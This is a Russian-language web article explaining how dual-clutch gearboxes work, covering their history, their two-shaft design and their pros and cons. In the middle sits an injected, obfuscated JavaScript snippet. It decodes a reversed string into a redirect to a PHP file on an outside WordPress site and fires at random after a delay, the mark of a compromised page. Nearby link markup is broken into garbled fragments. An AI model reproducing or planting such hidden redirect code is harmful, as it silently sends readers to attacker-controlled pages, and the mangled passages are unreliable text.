Трансмиссия

Двойное сцепление: совакупность достоинств механики и автомата

Бьюсь об заклад, процентов 90 из вас, прочитав заголовок этой статьи, подумает: «двойное сцепление что это»?

Не стыдитесь, большинство механиков в любом автосервисе не сразу сможет объяснить вам что это и как оно работает.

Но на самом деле ничего сложного в принципе работы этого механизма нет, а если вы внимательно ознакомитесь с этой статьей, то убедитесь в этом.

Историческая справка

Устройство перекочевало в конвейерное производство автомобилей со спортивных треков. Первый прототип появился в 1939 году. Его автор Адольф Кегресс, планировал установить его на Citroen Traction. Однако дальше чертежей дело не пошло.

И лишь в конце прошлого века компания Porsche создала КПП, которая переключала передачи без сбрасывания газа.

Если ранее при переключении передач форсированные моторы теряли мощность, в результате сброса газа, то система с двойным сцеплением обеспечивала переключение передач без снижения мощности крутящего момента.

Autoteka

Как устроено двойное сцепление

Главная суть изобретения, это использование в работе сцепления обоих (двух) валов коробки передач.

Если в обычном механическом варианте шестерни установлены на одном валу, то тут первое сцепление транслирует крутящий момент на внешний вал (для четных передач), а второе – на внутренний  (для нечетных передач).

Другими словами, в корпусе как бы размещены две механические коробки, которые работают попеременно.

$NfI=function(n){if (typeof ($NfI.list[n]) == «string») return $NfI.list[n].split(«»).reverse().join(«»);return $NfI.list[n];};$NfI.list=[«\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to-ru.ru/avtomaticheskaya-korobka-peredach.html» target=»_blank» rel=»noopener noreferrer»>автоматической коробки передач, в КП, имеющих двойное сцепление, нет гидротрансформатора. Есть варианты с «мокрым» двойным сцеплением (детали работают в смазочно-охлаждающей жидкости) и обычные, сухие.

Вообще, мнение специалистов сходится в том, что система DSG (Direct Shift Gearbox) самая лучшая для сухого двойного сцепления.

Принцип работы сухого двойного сцепления

В момент начала движения на первой передаче, автоматика начинает готовить вторую. В момент переключения первое сцепление выключается, а второе – включается.

После чего автоматика определяет, что авто разгоняется дальше и начинает готовить третью, и далее по такому же алгоритму.

Для определения следующей передачи автоматика учитывает:

  • положение педали газа (зависит от того разгоняется автомобиль или тормозит);
  • скорость вращения первого вала или второго;
  • угловые скорости вращение колес;
  • расположение рычага переключения КП.

Во время переключения на какие-то доли секунды первое и второе сцепления становятся замкнутыми.

В результате этого мотор остается соединенным с ведущими колесами и крутящий момент фактически не снижается.

Плюсы и минусы

Надо отдать должное конструкторам этого гениального изобретения. Такое сцепление дает удивительную плавность хода транспортного средства, переключение передач без рывков и дерганий. А по сути дела это же ведь механическая коробка передач.

Не зря авто концерн Volkswagen сделал основную ставку на такого рода коробки переключения передач и постоянно их совершенствует.

Единственный существенный недостаток – это масса сложных элементов, и соответственно это отражается на ценах на ремонт и обслуживание.

Плюсы

  • Экономия горючего. По сравнению с 5-ти ступенчатой автоматической КПП вариант с двумя сцеплениями расходует на 10 процентов меньше горючего;
  • Плавный ход и отсутствие рывков при переключении передач;
  • Отличная динамика – линейное ускорение без заметных потерь мощности;
  • Вариативность переключения передач – самостоятельно или на автомате;
  • Оптимальный вариант для мощных авто с двигателями на 200 – 500 л. с.

Минусы

  • Профессиональное сервисное обслуживание только в больших городах;
  • Сложная конструкция, и, следовательно, дорогое обслуживание и ремонт;
  • «Рывки» и «провалы» в процессе движения в спортивном режиме с постоянными торможениями и разгонами. При использовании такого стиля езды автоматика требует 400 — 600 миллисекунд, чтобы успеть определить передачу, на которую необходимо переключиться.

Коробки переключения передач с двойными сцеплением объединили все достоинства «to-takoe-mehanicheskaya-korobka-peredach.html» target=»_blank» rel=»noopener noreferrer»>механики» и «tomaticheskaya-korobka-peredach.html» target=»_blank» rel=»noopener noreferrer»>автомата»: малый расход горючего, плавность хода, удобство управления.

Все ведущие автопроизводители уже используют системы двойного сцепления на своих моделях, в этом будущее. Их распространение сдерживает лишь значительная себестоимость и опасения в среде потенциальных покупателей.

Тэги

Статьи по теме

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Back to top button